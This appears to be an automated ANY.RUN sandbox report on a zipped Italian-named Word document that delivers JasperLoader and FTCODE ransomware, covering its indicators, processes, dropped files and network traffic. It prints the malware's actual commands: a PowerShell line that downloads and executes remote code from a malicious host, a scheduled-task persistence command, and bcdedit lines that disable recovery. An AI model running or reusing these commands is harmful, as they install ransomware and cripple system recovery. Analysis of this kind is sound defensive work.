File name: emot.zip
Full analysis: https://app.any.run/tasks/1370dac3-bc03-4520-93cc-68c96c1f0574
Verdict: Malicious activity
Threats: Loader

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims' computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links, relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: October 14, 2019, 15:27:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: trojan, loader, jasper, ransomware, ftcode
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5: FBC1D3789183479D8686A60DCD08A473
SHA1: 07BA325AA3D4A823959D0E2312694B670ACAA091
SHA256: 918E74019C2720FFBF63187FAD60612C0B57B28FAC378BCECF4B064D9E6D5BA1
SSDEEP: 3072:fHE4oOkXBNE4ii0kkFh7BmTU41WwnIYo9HeLoOg1cvPUn:fH+IW9kFNQrWwnIhMsWU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 3784)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3784)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3960)
      • mmc.exe (PID: 3432)
    • Writes to a start menu file

      • powershell.exe (PID: 656)
    • JASPER was detected

      • powershell.exe (PID: 656)
    • FTCODE was detected

      • powershell.exe (PID: 656)
    • Uses Task Scheduler to run other applications

      • powershell.exe (PID: 656)
    • Renames files like Ransomware

      • powershell.exe (PID: 656)
    • Deletes shadow copies

      • cmd.exe (PID: 1488)
      • cmd.exe (PID: 324)
    • Starts BCDEDIT.EXE to disable recovery

      • cmd.exe (PID: 2892)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 656)
    • Creates files like Ransomware instruction

      • powershell.exe (PID: 656)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 656)
  • INFO

    • Manual execution by user

      • WINWORD.EXE (PID: 3784)
      • mmc.exe (PID: 4084)
      • mmc.exe (PID: 3432)
      • explorer.exe (PID: 2920)
      • Notepad.exe (PID: 1516)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3784)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3784)
    • Dropped object may contain URL to Tor Browser

      • powershell.exe (PID: 656)
    • Dropped object may contain TOR URL's

      • powershell.exe (PID: 656)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0001
ZipCompression: Deflated
ZipModifyDate: 2019:10:14 16:19:10
ZipCRC: 0x3afd77b0
ZipCompressedSize: 158607
ZipUncompressedSize: 14680065
ZipFileName: Nuovo_documento_95.doc
No data.
All screenshots are available in the full report
Total processes: 71
Monitored processes: 20
Malicious processes: 4
Suspicious processes: 0

Behavior graph

Processes shown in the graph (in order): winrar.exe, winword.exe, powershell.exe (#JASPER), schtasks.exe, mmc.exe, mmc.exe, explorer.exe, notepad.exe, cmd.exe (6 instances), bcdedit.exe (2 instances), wbadmin.exe (3 instances), vssadmin.exe

Process information

PID: 2148
CMD: "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\emot.zip"
Path: C:\Program Files\WinRAR\WinRAR.exe
Parent process: explorer.exe
User: admin
Company: Alexander Roshal
Integrity Level: MEDIUM
Description: WinRAR archiver
Exit code: 0
Version: 5.60.0

PID: 3784
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Nuovo_documento_95.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Exit code: 0
Version: 14.0.6024.1000

PID: 656
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ((New-Object Net.WebClient).DownloadString('http://jes.dhinsuranceservices.com/?need=stafhxt&vid=dpec10&22997'));
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: WINWORD.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3960
CMD: "C:\Windows\system32\schtasks.exe" /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 17 /du 23:59 /TR C:\Users\Public\Libraries\WindowsIndexingService.vbs
Path: C:\Windows\system32\schtasks.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Manages scheduled tasks
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 4084
CMD: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
Path: C:\Windows\system32\mmc.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Management Console
Exit code: 3221226540
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3432
CMD: "C:\Windows\system32\mmc.exe" "C:\Windows\system32\taskschd.msc" /s
Path: C:\Windows\system32\mmc.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Microsoft Management Console
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2920
CMD: "C:\Windows\explorer.exe"
Path: C:\Windows\explorer.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Explorer
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 1516
CMD: "C:\Windows\System32\Notepad.exe" C:\Users\Public\Libraries\WindowsIndexingService.vbs
Path: C:\Windows\System32\Notepad.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Notepad
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3832
CMD: "C:\Windows\system32\cmd.exe" /c bcdedit /set swzfijatbu bootstatuspolicy ignoreallfailures
Path: C:\Windows\system32\cmd.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 1
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 2892
CMD: "C:\Windows\system32\cmd.exe" /c bcdedit /set swzfijatbu recoveryenabled no
Path: C:\Windows\system32\cmd.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Command Processor
Exit code: 1
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events: 2 613
Read events: 1 798
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 0
Suspicious files: 29
Text files: 20
Unknown types: 13

Dropped files

PID | Process | Filename
2148 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb2148.39926\Nuovo_documento_95.doc
3784 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVREAB8.tmp.cvr
656 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZOHUMFAEFLHJWMN09WPJ.temp
3784 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{D1A57D08-A93E-4DDE-8534-34FF44E53A4F}.tmp
656 | powershell.exe | C:\Users\admin\Desktop\coloradocenter.rtf
656 | powershell.exe | C:\Users\admin\Desktop\hospitalmembership.rtf
656 | powershell.exe | C:\Users\admin\Desktop\hostdivision.jpg
656 | powershell.exe | C:\Users\admin\Desktop\jimprove.jpg
656 | powershell.exe | C:\Users\admin\Desktop\Nuovo_documento_95.doc
656 | powershell.exe | C:\Users\admin\Desktop\Nuovo_documento_95.doc.6c1967

(The MD5 and SHA256 columns of this table are empty in the report.)
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 4
TCP/UDP connections: 4
DNS requests: 3
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
656 | powershell.exe | GET | 200 | 185.189.151.22:80 | http://abby.abbyehughes.com/?need=aegzfej&vid=dpec10& | CH | text | 79.7 Kb | malicious
656 | powershell.exe | GET | 200 | 185.189.151.22:80 | http://jes.dhinsuranceservices.com/?need=stafhxt&vid=dpec10&22997 | CH | text | 9.34 Kb | malicious
656 | powershell.exe | POST | 200 | 185.158.249.197:80 | http://connect.contractorquote.info/ | NL | text | 2 b | malicious
656 | powershell.exe | POST | 200 | 185.158.249.197:80 | http://connect.contractorquote.info/ | NL | text | 2 b | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
656 | powershell.exe | 185.189.151.22:80 | jes.dhinsuranceservices.com | SOFTplus Entwicklungen GmbH | CH | malicious
656 | powershell.exe | 185.158.249.197:80 | connect.contractorquote.info | easystores GmbH | NL | malicious

DNS requests

Domain | IP | Reputation
jes.dhinsuranceservices.com | 185.189.151.22 | malicious
abby.abbyehughes.com | 185.189.151.22 | malicious
connect.contractorquote.info | 185.158.249.197 | malicious

Threats

PID | Process | Class | Message
656 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] JasperLoader Obfuscation
656 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Ransom.PowerShell.Ftcode.A!MSR
2 ETPRO signatures available at the full report
Process | Message
mmc.exe | Constructor: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe | OnInitialize: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe | AddIcons: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
mmc.exe | ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn